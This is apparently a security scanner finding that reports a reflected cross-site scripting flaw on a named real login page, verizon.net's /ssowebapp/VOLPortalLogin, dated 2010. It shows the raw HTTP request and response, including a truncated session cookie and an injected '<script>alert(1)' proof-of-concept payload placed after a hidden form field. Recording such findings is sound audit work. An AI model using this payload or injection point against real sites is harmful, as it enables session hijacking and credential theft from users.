1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | https://www.verizon.net |
Path: | /ssowebapp/VOLPortalLogin |
GET /ssowebapp/VOLPortalLogin Host: www.verizon.net Connection: keep-alive Referer: http://surround.verizon Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: VZCSESSIONID=pzXmMny |
HTTP/1.1 200 OK Server: Apache X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Expires: Sat, 20 Nov 2010 02:16:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 02:16:23 GMT Connection: keep-alive Set-Cookie: VZSSO_SESSIONID Set-Cookie: lob=consumer; domain=verizon.net; path=/ Set-Cookie: AprURL=http%3A%2F Set-Cookie: ActualProtectedResource Content-Length: 29010 <!-- Instance name: sso3a --> <html> <head> <META HTTP-EQUIV="CACHE-CONTROL <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>Sign In</titl ...[SNIP]... <input type="hidden" name="clientId" value="cnsmrshp983ec"><script>alert(1)< ...[SNIP]... |